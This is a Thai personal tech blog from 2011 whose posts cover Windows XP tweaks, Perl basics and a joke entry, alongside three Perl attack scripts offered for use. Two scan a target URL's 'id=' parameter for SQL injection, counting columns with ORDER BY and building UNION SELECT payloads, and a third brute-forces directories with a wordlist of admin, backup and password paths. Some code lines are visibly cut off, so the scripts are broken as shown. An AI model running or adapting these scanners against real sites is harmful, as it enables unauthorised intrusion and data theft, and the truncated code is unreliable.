temporarily e-mail
http://www.webemail.me/ <- Get 6 Hours
http://10minutemail.com/ <- Get 10 Minutes
-O-
http://www.webemail.me/ <- Get 6 Hours
http://10minutemail.com/ <- Get 10 Minutes
-O-
วันอาทิตย์ที่ 27 กุมภาพันธ์ พ.ศ. 2554
วันเสาร์ที่ 26 กุมภาพันธ์ พ.ศ. 2554
วิธีแก้ XP แสดงรายละเอียด GroupPolicy ไม่ครบ
จากที่เคยเข้า run>gpedit.msc [Group Policy] ในวินโดว์ XP แล้วมันแสดงรายละเอียดไม่ครบ
ให้คลิกขวาที่ User Configuration > Administrative Templates เลือก Add/Remove Templates
Add ไฟล์ system.adm เข้ามา หรือจะเลือกไฟล์ตัวอื่นด้วยก็ได้ เช่น wmplayer.adm(Windows Media Player") แต่หลักๆคือไฟล์ system.adm
และแล้ว รายละเอียดมันก็มาครบ...THE END...
วันศุกร์ที่ 25 กุมภาพันธ์ พ.ศ. 2554
[How to] turn off Autorun
Go 2 Registry : HKLM > SOFTWARE > Microsoft > Windows NT > CurrentVersion > IniFileMapping
New Key : Autorun.inf
Edit : (Default) > SYS:DoesNotExist
วันพฤหัสบดีที่ 24 กุมภาพันธ์ พ.ศ. 2554
[Perl] การอ่านค่า arguments ตอนเปิดไฟล์
เวลาเราเรียกใช้ perl เนี่ย บางทีเราอาจจะอยากส่งค่าบางอย่างไปตอนแรกเลย เช่น พิมพ์ :
perl xxx.pl test
ทีนี้ถ้าเราจะค่าอ่านข้อความ test ที่ส่งไปละ :
### xxx.pl ###
print $ARGV[0];
#Output : test
หรืออีกวิธีนึง
### xxx.pl ###
$a=shift;
print $a;
#Output : test
แล้วถ้าเราส่งค่าไปหลายตัว เช่น perl xxx.pl test1 test2 hahaha :
### xxx.pl ###
print "$ARGV[0] $ARGV[1] $ARGV[2]";
#Output : test1 test2 hahaha
วันพุธที่ 23 กุมภาพันธ์ พ.ศ. 2554
[Perl] Comment หลายบรรทัด
ปกติเขียน perl ก็ใช้ แต่
# ข้อความ
เป็นการใช้ # นำหน้าบรรทัดที่จะ comment แต่มันก็ทำได้แค่บรรทัดเีดียว
แต่ถ้าจะ comment หลายบรรทัดละ
=pod
...
...บรรทัดนี้ บ่ได้เอาไปแปลด้วยดอก
...
=cut
ก็จะใช้ =pod , =cut คร่อมเอาไว้
Reference : http://perldoc.perl.org/perlpod.html
นอนละ zzZZ
วันอาทิตย์ที่ 13 กุมภาพันธ์ พ.ศ. 2554
ที่มาของคำว่า ไสหัวไป
พอดีว่าไปเจอมาเวปไหนไม่รู้ พอมา search ใน google ว่า "ที่มาของคำว่า ไสหัวไป" ก็เจอเกลื่อนเลย ฮ่าๆๆ
เลยเอามาประดับบล็อกมั่ง ดูกี่ทีก็ขำ 555+
วันพุธที่ 9 กุมภาพันธ์ พ.ศ. 2554
[Perl] SQL Scan #2
SQL Scan แบบนี้ คาดว่าน่าจะใช้ได้ดีกว่าแบบเดิมอยู่นะ
ดูโค้ดดีๆนะครับ เพราะตรงข้อความไหนที่มีเครื่องหมาย 'มากกว่า' หรือ 'น้อยกว่า' อยู่มันจะไม่ติด ก็ให้ไปดูโค้ดเอาใน pastebin เอาละกัน
SOURCE CODE : http://pastebin.com/MyH0kj0a
## SQL Scan #2 ##
use LWP::UserAgent;
print "SQL Injection\n[+] Target \"www.xxx.xxx/index.php?id=\" = ";
chomp($target=
@target=split(//,$target);
while ($target[$#target]=~/[0-9]/ || $target[$#target]=~/-/) {
pop(@target);
}
$target=join('',@target);
unless ($target=~/^http:\/\//) {
$target='http://'.$target;
}
print "[+] Scan ",$target,"\n";
$target.="-1+UNION+SELECT+1";
$oritarget=$target;
chop($oritarget);
print "[] Scan : 1\n";
$agent=LWP::UserAgent->new;
SCAN : for ($i=2;$i<50 i="">
$content=$agent->get($target)->content;
unless ($content=~/Warning/) {
print "[+] Found : $target";
last SCAN;
}
print "[] Scan : ",$i,"\n";
$target=$target.",".$i;
}
print "[-] Not found";
วันอาทิตย์ที่ 6 กุมภาพันธ์ พ.ศ. 2554
[Perl] SQL Scan
ได้เขียน scan dir ไปละ เขียน scan sql ต่อเลยละกัน เอิ๊กๆ
SOURCE CODE : http://pastebin.com/TdbdnUJM
## SQL SCAN##
use LWP::UserAgent;
print "SQL Injection\n[+] Target \"www.xxx.xxx/index?id=\" = ";
chomp($target=
unless ($target=~/^http:\/\//) {
$target='http://'.$target;
}
$sql="1+order+by+";
print "[+] Scan column in ",$target,"\n";
$agent=LWP::UserAgent->new;
for ($i=1;$i<=50;++$i) {
print "[] Scan : ",$i-1,"\n";
$bug=$target.$sql.$i;
$response=$agent->get($bug);
$content=$response->content;
if ($content=~m/Warning/ig) {
$i-=1;
$bug=$target.$sql.$i;
print "[+] Found : ",$bug,"\n";
$ex=$target."1+and+1=0+union+select+1";
for ($j=2;$j<=$i;++$j) {
$ex=$ex.",".$j;
}
print "[+] Found : ",$ex;
exit;
}
}
print "[-] Not Found";
[Perl] Scan Directory
ว่าจะได้ลองทดสอบ SyntaxHighlight ไปด้วย แต่ลองแล้วไม่ติด - -"
ช่างมัน ค่อยไปโพสใส่ pastebin อีกทีก็ได้ว้า...
SOURCE CODE : http://pastebin.com/ACYeXFis
## Perl Scan Directory ##
use LWP::UserAgent;
print "Scan Directory\n[+] Target \"www.xxx.xxx\" : ";
chomp($domain=
unless ($domain=~/http:\/\//) {
$domain='http://'.$domain;
}
print "Scan Directory : ",$domain,"\n";
$agent=LWP::UserAgent->new;
$agent->max_redirect(0);
open(FILE,"dir.txt");
@dir=
close(FILE);
foreach (@dir) {
chomp;
$url=$domain.'/'.$_;
$response=$agent->head($url);
print "[] Scan : $url";
unless ($response->status_line=~/^404|^302/) {
print " ..... ",$response->status_line;
}
print "\n";
}
## dir.txt ##
0
1
12123
123
9
admin
administrator
administrators
back
backup
backups
backupz
etc
file
files
front
image
images
index
ip
list
lists
log
logfile
logfiles
login
more
new folder
new folders
old
pwd
pwds
password
password
root
roots
test
tesetz
text
texts
txt
secret
source
sources
web
webmaster
webmasters
z
zecret
สมัครสมาชิก:
บทความ (Atom)